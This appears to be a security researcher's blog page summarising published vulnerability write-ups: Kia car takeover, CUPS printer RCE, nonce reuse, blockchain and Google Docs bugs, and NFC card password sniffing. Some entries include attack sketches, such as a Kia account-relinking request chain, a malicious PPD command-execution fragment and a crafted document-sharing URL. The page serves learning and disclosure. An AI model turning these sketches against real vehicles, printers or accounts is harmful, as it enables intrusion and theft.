Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Hacking Kia: Remotely Controlling Cars With Just a License Plate - 1505

Sam Curry    Reference →Posted 1 Year Ago
  • Two years ago, Sam Curry and friends released one of the most banger blog posts ever - hacking every car company. After some time, they decided to come back and see if things had changed. This time, they took a look at Kia. Originally, they had focused on owners.kia.com and the Kia iOS app because both could remotely execute commands. The owners website used a backend reverse proxy to forward user commands to api.owners.kia.com, whereas the mobile app talked to it directly.
  • This time around, they decided to tackle the problem from the dealer's side. From talking with friends, they learned that the dealership would ask for your email and you'd receive a registration link to create a new Kia account or add the car to a pre-existing one. They got an actual link from a friend and started playing around with it.
  • The linking request contained a VIN and a token known as the VIN Key. This key is an access token generated by the Kia dealer as a one-time grant to modify the vehicle information. Under the hood, this was using the same API at owners.kia.com, once again through a reverse proxy. They were curious whether more functionality existed on this API than they knew about. After digging through the JavaScript, they found a function for looking up accounts and vehicles that appeared to be employee-only functionality.
  • Trying to interact with this endpoint returned an error about not having a proper access token. So, what if they could register on the dealer website? They copied the request format from other user-related endpoints, pointed it at the dealer site, and it just worked! They then logged into the dealer website with the new account and were able to generate a dealer token.
  • With this, they went through the JavaScript to understand the functionality that had been unlocked. They could search for car information based on a VIN. What they really wanted, though, was to remotely take over the car! Sifting through the JavaScript, they found a chain of roughly seven API calls that allowed them to execute commands on the car: a user lookup, linking the victim's vehicle to an attacker-controlled account, and finally executing the commands. This affects every Kia made after 2013. Neat!
  • They rented a car to see this work, which is hilarious. Like this one, many of the coolest vulnerabilities come from deep recon and understanding your target well. The idea of swapping endpoints on the registration request seems simple, but getting there was complicated. Mitigating this doesn't seem trivial, but the two-month remediation timeline still feels too long. Good write up!
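As a rough sketch, the dealer-side chain might look something like this. Every endpoint path, hostname and field name below is invented for illustration; only the overall flow (owner lookup -> account re-link -> remote command) comes from the write-up:

```python
# Hypothetical sketch of the dealer-token attack chain. Paths and hosts are
# invented; only the lookup -> link -> command flow is from the post.
BASE = "https://dealer.kia.example/api"  # illustrative host, not the real one

def build_attack_chain(dealer_token: str, vin: str, attacker_email: str):
    """Return the sequence of requests an attacker would send, in order."""
    auth = {"Authorization": f"Bearer {dealer_token}"}
    return [
        # 1. Look up the current owner's account from just the VIN
        ("POST", f"{BASE}/owner/lookup", auth, {"vin": vin}),
        # 2. Re-link the vehicle to an attacker-controlled account
        ("POST", f"{BASE}/account/link", auth, {"vin": vin, "email": attacker_email}),
        # 3. Issue remote commands as the new "owner"
        ("POST", f"{BASE}/vehicle/command", auth, {"vin": vin, "command": "UNLOCK"}),
    ]

chain = build_attack_chain("dealer-token", "EXAMPLEVIN0000000", "attacker@example.com")
```

The point of the sketch is that every step rides on the single dealer token from the registration trick; nothing else authenticates the caller.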

Attacking UNIX Systems via CUPS, Part I - 1504

EvilSocket    Reference →Posted 1 Year Ago
  • The Common Unix Printing System (CUPS) is installed on most Linux distros by default. When setting up a new laptop, the author of this post noticed that port 631 was open on 0.0.0.0 and associated with CUPS. The cups-browsed subsystem is responsible for discovering new printers and adding them to the system. The article is about the journey into madness of reading through this code.
  • The service can be connected to by anyone, with no restrictions. A configuration file allows this to be restricted, but it's not locked down by default on any of the systems they reviewed. Running the service through AFL gave them 5 unique crashes. Two of them appeared to be pointers being dereferenced before the exit condition was verified; another was a denial of service from a lock being held for too long.
  • They didn't even try to exploit these, as they thought lower-hanging fruit might be available. They hacked together some Python code to talk to the service and got back a connection over the Internet Printing Protocol (IPP) to their computer from a box on the Internet. Now the Linux box thinks our friend EvilSocket is a printer, sending many HTTP requests for information such as the model, vendor and other details.
  • They found a Python library called ippserver to speak the protocol properly. Using it, they were able to add a fake printer to the computer without any user interaction. Now we have a good way to interact with the Linux machine as a fake printer and dig deeper.
  • While reading the service logs, they saw references to a PPD, or PostScript Printer Description, file. This text file is provided by vendors to describe printer capabilities to CUPS and, via a DSL of various commands, instructs the interface on how to use the printer properly. Notably, the fake printer writes this file to the user's system to describe how to interact with it.
  • After reading the documentation for some time, they came across the cupsFilter2 directive. This will execute binaries located within a particular location on the system, and the checks on which binaries can be executed are pretty solid. Luckily, there are some programs to work with, including foomatic-rip. This program accepts an arbitrary command to be executed via bash!
  • This sounds crazy (and it is) but it's apparently a necessary evil. The issue has been known for a while but is difficult to fix because of the way drivers for older printers rely on it. They even found one doozy that was running a Perl command. The issue was once patched in FoomaticRIPCommandLine, but the fix was not carried over when this functionality was ported to CUPS. Sometimes security is in direct conflict with backwards compatibility and usability.
  • This isn't a zero-click RCE, luckily, but it's still scary. First, an attacker adds their printer to the machine. Next, they return the malicious directive that gives arbitrary command execution. Finally, the user must send a print job to the fake printer, which pops a shell when executed. To get this to run, they needed a parsing bypass (easy, by adding a few spaces) so the directive would be executed via cupsFilter. An amazing bug that only took them a weekend to find.
  • The remediation process seemed quite terrible and time-consuming for them. Most of the discussion was around whether this was a real issue that needed to be addressed at all. When you get arguments like "I am just pointing out that the public Internet attack is limited to servers that are directly connected to the Internet" to try to limit the expected impact, it's hard, especially with the 200-300K devices likely affected on Shodan alone.
  • I feel bad about how this was handled, as it was pretty terrible. The people working on CUPS want to add features to make users' lives better, and security is just a thorn in the side of that goal. They're also, in all likelihood, volunteers. As developers, we need to be open to fixing our mistakes and evaluating impact for what it truly is. Great write up on both the technical and non-technical side!
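For reference, the malicious PPD trick above boils down to a couple of directives. The fragment below is a paraphrase of the shape of the published PoC, not the exact file (the command string is a harmless placeholder, and the extra space is the parsing bypass mentioned in the post):

```
*% Sketch of a malicious PPD fragment (paraphrased, not the exact PoC)
*% foomatic-rip hands FoomaticRIPCommandLine to a shell when a job prints
*FoomaticRIPCommandLine: "echo pwned > /tmp/pwned"
*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip"
```

The fake printer serves this PPD when the victim's cups-browsed adds it; the command only fires once a print job is sent to that printer.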

Friends don’t let friends reuse nonces - 1503

Joe Doyle - Trail of Bits    Reference →Posted 1 Year Ago
  • In cryptography, a nonce (number used only once) is an important part of many encryption and signature algorithms. It's a big deal not to reuse nonces, even though they are usually allowed to be public. When reuse happens, it can reveal secrets in encrypted messages or even recover the private key in the case of DSA. The article talks about why nonce reuse is so bad.
  • Encrypted channels work by transforming the content of a message into effectively random noise that is decoded on the other end. Going back to old ciphers from the 1500s, the mechanism was to substitute a given symbol with another mapped symbol; the mapping could be applied in the opposite direction to decrypt. The security relies on third parties (Evil Eve) not being able to infer information about the symbol-substitution procedure from the encrypted data.
  • Many ciphers were broken by observing patterns within the encrypted messages, such as the Banburismus technique used against the Enigma machine. To prevent this from happening, instead of mapping single symbols, modern ciphers use 128 or 256-bit block sizes. Additionally, there are rules in place to ensure a good substitution table for every symbol - or block, in this case.
  • The first part shows the classic Linux Tux penguin being encrypted using ECB mode. Even though it's encrypted, you can still see Tux in the image! This is because blocks with the same data produce the same output. To prevent this, we introduce a nonce.
  • AES-CTR and ChaCha20 are both encryption modes that use an incrementing value as the nonce. CTR mode is a bit weird: it encrypts the nonce (plus a counter) to make a keystream and XORs that with the plaintext. Because of this, if you ever reuse a nonce, an attacker who sees two encrypted messages can XOR them together to learn the XOR of the two plaintexts - with the two images in the post, XORing the ciphertexts makes both pictures visible. If nonces aren't reused between different messages, this recovery is impossible.
  • Recently, when auditing a protocol, they found a related issue where Alice, Bob and Carol were the actors in a peer-to-peer communication model. After a secret-sharing exchange via asymmetric cryptography, they generate a key for ChaCha20 to use. When the algorithm is initialized, all of them start with a nonce of zero.
  • As a result, if an attacker can sniff a message going from Alice to Bob and another from Bob to Alice with the same key and nonce, they can XOR the encrypted data together to recover the XOR of the originals! The important fields being XORed are pseudorandom, so it's not possible to learn all of their contents. The nonce reuse did, however, allow them to leak the MAC key, after which a MitM could have modified messages in transit.
  • The major difference can be seen with Tux and Betsy, and why the full message couldn't be recovered: notice that the image was not perfectly reconstructed. The earlier images leaked so clearly because of the large amounts of white and black in them, making the overlaps obvious. In the real world, if the underlying bytes are random, you won't see anything, because the XOR of two random-looking plaintexts still appears random.
  • Overall, I enjoyed the post and the visuals from it!
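The keystream-cancellation trick is easy to demo. The sketch below fakes a CTR-style keystream with a hash - a toy construction for illustration, not a real cipher - just to show that reusing the same (key, nonce) pair makes c1 XOR c2 equal p1 XOR p2:

```python
import hashlib

def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    # Toy CTR-style keystream: hash(key || nonce || counter) blocks.
    # Illustration only -- do not use as an actual cipher.
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

key = b"shared-secret-key"
nonce = b"\x00" * 8  # both messages reuse the same nonce

p1 = b"attack at dawn!!"
p2 = b"retreat at dusk!"

c1 = xor(p1, keystream(key, nonce, len(p1)))
c2 = xor(p2, keystream(key, nonce, len(p2)))

# The keystream cancels out: c1 ^ c2 == p1 ^ p2
assert xor(c1, c2) == xor(p1, p2)
# Knowing (or guessing) p1 then recovers p2 entirely
assert xor(xor(c1, c2), p1) == p2
```

With the images from the post, p1 and p2 are the pixel data, which is why XORing the two ciphertexts makes both pictures visible.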

Top 5 Bugs from the Fuel Attackathon - 1502

Immunefi    Reference →Posted 1 Year Ago
  • Fuel Network is an Ethereum L2 with a custom language, bridge and VM. The contest had a reward pool of $1M. Some big-time vulnerabilities were found in it, which are explained in the article.
  • In Fuel, messages can be sent from the L2 to the L1. The function update_execution_data adds all message IDs to the MessageOut receipts of the current tx execution data, even if the tx itself has reverted. Because the tx failed, the tokens are un-burned on the Fuel side. Even though the receipt was already produced by a reverted call, it can be used again on a successful one. This makes it possible to relay the same receipt multiple times (as long as it corresponds with another user transfer) to steal the user's funds.
  • The next two issues are compiler-related. Supertraits allow defining a function that is inherited by a contract implementing a given trait. Because these can be sensitive functions, they should be locked down by the user-programmed behavior. In reality, all supertrait functions are exposed externally. The example they show is renounce_ownership being called by an arbitrary user, even though it shouldn't be callable.
  • The second compiler bug is an optimization issue. The compiler needs to decide which instructions are dead and which are in use, and the DCE (dead code elimination) pass removes code that has no bearing on the program's output. The Sway optimization step labeled instructions whose results were actually used as dead code. This leads to incorrect values in a register and unexpected program behavior.
  • One of the standard libraries was missing overflow protection in the pow function for smaller data types such as u8, u16 and u32. If developers expected these overflows to be caught (a fair assumption), incorrect math would occur, leading to potential security risks.
  • The Code Copy (CCP) instruction copies code from a specified contract into memory. When it does this, it charges gas based on the contract's total size rather than the number of bytes copied. If the offset given into the contract's bytecode exceeds its length, unwrap_or_default returns an empty slice. The write to memory still occurs, with logic to backfill with zeros when the lengths don't line up. Neat!
  • Since the cost is tied to the size of the contract and nothing is actually copied, this ends up being super cheap! In blockchain-land, making an expensive operation (like zeroing memory) artificially cheap can lead to a denial of service (DoS) by resource exhaustion.
  • I took some time to look at the code when this contest happened but didn't find anything. It was interesting to see bugs in the compiler and bridge handling, given that I spent my time looking at the VM for memory safety issues. I enjoyed the write-up and learned a bunch more about proper target selection!
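The missing overflow check on small-integer pow is easy to picture. Here's a toy Python model of wrapping 8-bit exponentiation (the real code is in Sway's standard library, so this is just an analogy for the behavior):

```python
def pow_u8_wrapping(base: int, exp: int) -> int:
    """Model of a u8 pow with no overflow check: the result silently wraps."""
    result = 1
    for _ in range(exp):
        result = (result * base) & 0xFF  # keep only the low 8 bits, like a u8
    return result

# 3**5 = 243 still fits in a u8...
assert pow_u8_wrapping(3, 5) == 243
# ...but 2**8 = 256 silently wraps to 0 instead of raising an error
assert pow_u8_wrapping(2, 8) == 0
```

A developer expecting a checked pow would treat 0 here as a legitimate result, which is exactly the kind of incorrect math the finding describes.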

Banana Gun Hacked - 1501

Rekt    Reference →Posted 1 Year Ago
  • BananaGun is a Telegram trading bot for Ethereum and Solana. From reading the documentation, the bot can be configured by the user to perform various actions automatically or directly from the app. This means that, in some capacity, the bot must have access to users' private keys.
  • The analysis makes it pretty clear where the vulnerability was. Only users with a public presence were affected, so the bot itself had been manipulated somehow. According to the write-up, the oracle for the Telegram bot had been tricked. There are no details on what exactly went wrong in the oracle, but it was probably something like missing contract address checks.
  • At the end of the day, $3M was stolen from 11 users of the platform using this vulnerability. Afterwards, BananaGun added 2FA, transfer delays and security reviews - all things that should have been done before the hack. I find web3 off-chain infrastructure interesting, so this bug tickled my fancy on that end. I wish we had more details on the actual oracle vuln though.

Help Scout - Mass assignment vulnerability on inbox settings - 1500

Synacktiv    Reference →Posted 1 Year Ago
  • Help Scout is a shared inbox, help center and live chat software to manage customer communications. Among other things, emails can be sent to customers from external email addresses proxied through Help Scout.
  • To add an email to a shared inbox, a verification code is sent to the email to ensure that you have control over it. Once this has been verified, emails can be sent through the email address.
  • This is a two-step process: setting and verification. When retrieving the settings in the response, the authors noticed the field emailIsConfirmed. By setting this field in the JSON of the settings request, the email is marked verified without the code ever being entered. This is commonly referred to as a mass assignment vulnerability, though it isn't super common in the wild.
  • Since the email is going through Help Scout, which has verified the proxied address, the SPF and DKIM checks will pass. This allows spoofing an arbitrary sender with domain verification through Help Scout. WordPress, PyPI, Mailchimp and DigitalOcean are big targets that use the platform. Overall, a good post that is straight to the point.
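Mass assignment is what happens when a handler blindly copies every client-supplied field onto the model. A minimal sketch - the field name emailIsConfirmed is from the post, but the handler and model below are invented for illustration:

```python
class InboxSettings:
    """Toy model of an inbox's email settings (invented for illustration)."""

    def __init__(self):
        self.email = None
        self.emailIsConfirmed = False  # should only flip after code verification

    def update_from_json(self, data: dict) -> None:
        # Naive mass assignment: every client-supplied key lands on the model,
        # including fields the client was never meant to control.
        for key, value in data.items():
            setattr(self, key, value)

settings = InboxSettings()
# Attacker adds the internal flag to the settings request body
settings.update_from_json({"email": "ceo@victim.example", "emailIsConfirmed": True})
assert settings.emailIsConfirmed  # verification step skipped entirely
```

The fix is the usual one: an explicit allowlist of writable fields, so server-managed flags like emailIsConfirmed can never arrive from the client.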

Cracking the Digital Business Card - 1499

IMcPwn    Reference →Posted 1 Year Ago
  • Popl is a digital business card. The cards contain an NFC tag that lets someone open a website so you can connect with them later. The Popl app, used for setting up the electronic part of the business cards, has a $77 annual subscription fee.
  • To me, this is a classic case of "I own these and therefore I should be able to do what I want with them". The goal was to edit the NFC data on the card to whatever information we wanted - since, after all, we own it.
  • The author first tried the classic NFC Tools app to change the record information. The NFC tag had a password write-protect feature (the password can only be 4 bytes long). They tried the default passwords 00000000 and FFFFFFFF, but neither worked. Next, they tried the Unlock NTAG NFC action on the Flipper Zero, to no avail. At this point, we know the system isn't using any default or easy-to-guess passwords.
  • They then tried an iCopy tool, which just wraps the Proxmark. Using this, they dumped all available page information from the tag. Apparently the Proxmark can sometimes pull the password off a card, but it couldn't in this case. From crunching the numbers, they claim it would take 27 years to brute-force the stored password, making that unviable as well.
  • The iOS application for the business cards must communicate with the NFC chip to write the URL to it. If that's true, then the phone app must have access to the password! Since the password is required for writing, and the app does indeed write, we should be able to recover it. Using the Proxmark's trace list command, we can see all commands sent to the card - and in the output is an authentication command with the password in plaintext! The password is just the string test :)
  • With a known password, the author wanted to edit the card. Using the NFC Tools app's Advanced Commands to send a raw packet, they were able to authenticate successfully. For whatever reason, though, authentication would succeed but every write would fail. Although this could probably be solved by writing a custom app, they wanted something easier.
  • With these NFC tags, it's possible to simply remove the password - and doing so with the Proxmark worked! It should be noted (not in the article) that NFC Tools uses the first 4 bytes of an MD5 hash of the password you enter, not the raw bytes, while other apps like NFC Read Write use the raw bytes.
  • Finally, they were able to write to their NFC card! This was a good write up, and fun to see a real-world application of NFC. In my mind, there is no good way to secure this against unauthorized writes because the password can always be sniffed or reverse-engineered from the app. Newer NFC tags support more secure authentication protocols (I think?) that could potentially be proxied to a server to prevent writes in the future. But regardless, I'm happy this got cracked!
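The MD5 detail is worth a quick demo: with the password test, an app that derives the 4-byte auth value from an MD5 hash sends different bytes on the wire than one using the raw string, which explains why different tools can disagree on the "same" password:

```python
import hashlib

password = b"test"  # the plaintext password sniffed from the Proxmark trace

# NFC Tools style: first 4 bytes of the MD5 digest of the entered password
md5_pwd = hashlib.md5(password).digest()[:4]

# Raw style (e.g. apps like NFC Read Write): the password bytes themselves
raw_pwd = password[:4]

# The two derivations disagree, so the same typed password authenticates
# differently depending on which app built the command.
assert md5_pwd != raw_pwd
print(md5_pwd.hex(), raw_pwd.hex())
```

So if raw-bytes authentication works but an MD5-deriving app fails (or vice versa), the password itself may still be correct.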

Using YouTube to steal your files - 1498

lyra    Reference →Posted 1 Year Ago
  • The author found several weird quirks and behaviors that were not useful individually. By combining them all, they were able to steal files through Google Slides with YouTube.
  • Google Slides allows embedding YouTube videos. When doing so, it simply adds the video ID into a URL on the page. Using directory traversal, it's possible to go backwards to other paths on YouTube. Since YouTube has anti-framing protections, the main page couldn't be used, but emojis, CSS/JS and some other resources could be framed. Our own website here would be nice to have!
  • The author then started looking for an open redirect on YouTube. They first looked at how external links were processed, but realized that required an extra click. Next, they reviewed the authentication flow and found a redirect, but only to a few YouTube subdomains. Luckily, they found an open redirect on accounts.youtube.com - but ONLY to various Google products.
  • The redirect chain is now YouTube -> accounts.youtube.com -> docs.google.com. Why is this helpful, though? According to the author, Google Docs sets SAMEORIGIN in its frame options, meaning nothing but Docs itself should be able to frame the page. And if a document has been framed, dangerous functionality like sharing is automatically disabled, making this hard to exploit.
  • While looking through links, they came across docs.google.com/file/d/{ID}/edit. This page gives a preview of the file and allows sharing the document as well. It also stays on the docs.google.com domain instead of redirecting to Drive.
  • They remembered that Google has a feature for requesting access to a folder, which sends an email with a link that prepopulates the request information. While messing with the fields, they noticed they could turn this from two clicks into one by adding the userstoinvite parameter to the URL. Additionally, removing the capabilities option from the URL just defaulted to edit access.
  • Putting everything together still doesn't frame the permissions page, though. Why? Various people at Google mentioned a server-side mitigation that prevents cross-origin framing by checking the Sec-Fetch-Dest and Sec-Fetch-Site headers. To bypass it, the request BEFORE the file preview must be a same-origin redirect instead of coming from YouTube.
  • Instead of finding another open redirect, they realized that ANY URL change involving a redirect was fine. For instance, https://docs.google.com/a/a/file/d/<file>/edit would land on the file after the redirect. To make this more believable, they put a Google Form over the top of the docs link with a hole cut over a particular portion of it. All it takes is one click!
  • Here's the full attack:
    1. Create a Google Slide deck with the crafted URL as an embedded video.
    2. User loads the Google Slideshow which will load the page we need with the steps below.
    3. Path traversal is performed on YouTube.com to move to accounts.youtube.com.
    4. Use the redirect from accounts.youtube.com to the /a/a google doc link.
    5. Redirect is done to go to the document sharing link.
    6. User clicks on the iFramed box, giving the attacker access to it.
  • The amount of steps and problem-solving here was amazing! I found this via James Kettle, and the post did not disappoint at all. The more I read about client-side security, the more I realize I know nothing about the browser. Great post!
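As a sketch, the final link in the chain might be assembled like this. The file ID and email are placeholders, and while the /a/a path trick and the userstoinvite parameter come from the post, the exact query-string format below is my guess:

```python
file_id = "FILE_ID_PLACEHOLDER"      # victim document ID (placeholder)
attacker = "attacker@example.com"    # account that should receive edit access

# The /a/a/ prefix forces a same-origin redirect on docs.google.com, which
# satisfies the Sec-Fetch-* server-side framing checks; userstoinvite
# prepopulates the access request so one click on the framed button grants it.
share_url = (
    "https://docs.google.com/a/a/file/d/"
    f"{file_id}/edit?userstoinvite={attacker}"
)
print(share_url)
```

This is the URL the Google Slides embed ultimately reaches via the YouTube traversal and accounts.youtube.com redirect.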

Ghost in the Block: Ethereum Consensus Vulnerability - 1497

Giuseppe Cocomazzi - Asymmetric Research    Reference →Posted 1 Year Ago
  • Simple Serialize (SSZ) is used by Ethereum clients in the consensus protocol and in peer-to-peer communication. SSZ's soundness depends on the involutive and injective properties. The involutive property is that serializing a value and then deserializing it resolves to the original value. The injective property is that if serialized A equals serialized B, then A and B must be the same value - no two distinct values share an encoding. Some of these properties didn't hold, which resulted in a vulnerability.
  • SSZ relies on offsets and lengths for encoded objects. For the serialized block we want to send (a SignedBeaconBlockDeneb object), there are multiple layers of nesting to properly transfer all the information. Within a block is a body: following the block's offset of 0x64 and then the body's offset of 0x54 within the block puts us at 0xB8.
  • The body contains its own set of values with their own offsets in the block data. With this whole system of offsets to locate objects, serialization works well - and it should be a requirement that there are no gaps in the data. However, by shifting the offsets of objects (which have set lengths), ghost regions can be inserted into the data.
  • By itself, this isn't a huge deal. However, not all clients handle it the same way - many will reject such block data outright. Since Prysm accepts it (shown above) while Lighthouse rejects it, this leads to a consensus failure in the protocol. Doing this does not modify the hash tree root at all, either. When they set this up locally, the network just stopped entirely.
  • An interesting takeaway from the author: "Paradoxically enough, the same design choice of favoring multiple implementations has brought a new vulnerability class, that of “consensus bugs”, on which we hopefully shed some new light." Overall, a great article on a subtle difference in the Ethereum serialization code.
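A toy model of the ghost-region idea (not real SSZ, just the offset mechanics): a lenient decoder that trusts the offset decodes a padded encoding to the same value as the honest one, so two different byte strings map to one value and injectivity breaks:

```python
import struct

def serialize(fixed: bytes, variable: bytes, gap: int = 0) -> bytes:
    """Toy container: [4-byte offset][fixed part][optional ghost gap][variable part].

    A malicious encoder can inflate the offset, leaving an unread
    "ghost region" of bytes between the fixed and variable parts.
    """
    offset = 4 + len(fixed) + gap
    return struct.pack("<I", offset) + fixed + b"\x00" * gap + variable

def decode_lenient(blob: bytes):
    """Lenient decoder: trusts the offset, never checks for gaps."""
    (offset,) = struct.unpack("<I", blob[:4])
    return blob[4:6], blob[offset:]

honest = serialize(b"AB", b"payload")          # offset = 6, no gap
ghost  = serialize(b"AB", b"payload", gap=3)   # offset = 9, 3 ghost bytes

# Two distinct byte strings decode to the same value under a lenient
# decoder; a strict decoder would reject the second blob instead --
# and that disagreement is the consensus split.
assert honest != ghost
assert decode_lenient(honest) == decode_lenient(ghost)
```

In the real bug, Prysm played the role of the lenient decoder and Lighthouse the strict one, so the same block was simultaneously valid and invalid on the network.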

The unreasonable success of Fuzzing - 1496

Halvar Flake    Reference →Posted 1 Year Ago
  • Fuzzing is a technique that many of us know and love. But why is it so effective? This talk aims to go through the origins of fuzzing and why it works as well as it does.
  • The origins stem back to software being bad in the 90s and early 2000s. For a while, people felt that "you fuzz if you're too stupid to audit code". Over time, this perception changed. Back then, you could send random data to most programs and get a crash - including a remote OpenSSH bug, a RealServer (music streaming) RCE, Cisco IKE and an Acrobat font bug.
  • After covering the introduction of fuzzing and its effectiveness, the author gives us reasons why it's so good. First, it's crazily efficient: it parallelizes well, it's only limited by computing power, and it gives very few false positives. They do mention it's worth "being clever" to make it faster, which can make a big difference in some situations.
  • Next, it scales with the complexity of the project, finding weird states that a human doesn't have time to think about. This seems to be a theme - the next point is that fuzzers are generally simple designs compared to fully understanding a project. Sending random data is much simpler to set up than static analyzers, solvers or pure code review.
  • The final section discusses the similarities between AI and fuzzing, based on the "bitter lesson" that computational search beats human intuition. The article linked above walks through Chess and Go AI history and ends with computer vision. I personally fall into the trap of thinking my personal knowledge will beat a computer doing something, but that's almost always wrong. Combining the human's ability to optimize and make the computers faster is what we should focus on.
  • They see fuzzing the same way: it requires lots of computing power, with the smarts of the person setting it up determining its efficiency. The success of fuzzing depends on large tree searches.
  • They go through the issues with code coverage as the main fuzzer metric, which is limited by the program's implicit state machine. How can this be improved? Should the state machine be modeled explicitly?
  • The talk ends by asking whether the future is more clever fuzzing or more systems engineering to make the fuzzer run more iterations. I think it's a combination of both, but these are interesting parallels to an industry I had not considered very much in security.
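The core loop really is as simple as the talk suggests. Here's a toy random fuzzer against a toy parser - both invented for illustration, with none of the coverage feedback a real fuzzer like AFL adds:

```python
import random

def parse(data: bytes) -> None:
    """Toy target: 'crashes' on inputs longer than 2 bytes with a magic first byte."""
    if len(data) > 2 and data[0] == 0x42:
        raise RuntimeError("crash")

def fuzz(iterations: int = 100_000, seed: int = 0) -> list:
    """Throw random byte strings at the target and collect crashing inputs."""
    rng = random.Random(seed)
    crashes = []
    for _ in range(iterations):
        data = bytes(rng.randrange(256) for _ in range(rng.randrange(1, 8)))
        try:
            parse(data)
        except RuntimeError:
            crashes.append(data)
    return crashes

crashes = fuzz()
# Every crashing input independently rediscovered the magic-byte condition.
```

The whole harness is a dozen lines; the "being clever" part of real fuzzing is in mutation strategy and coverage feedback, not the loop itself.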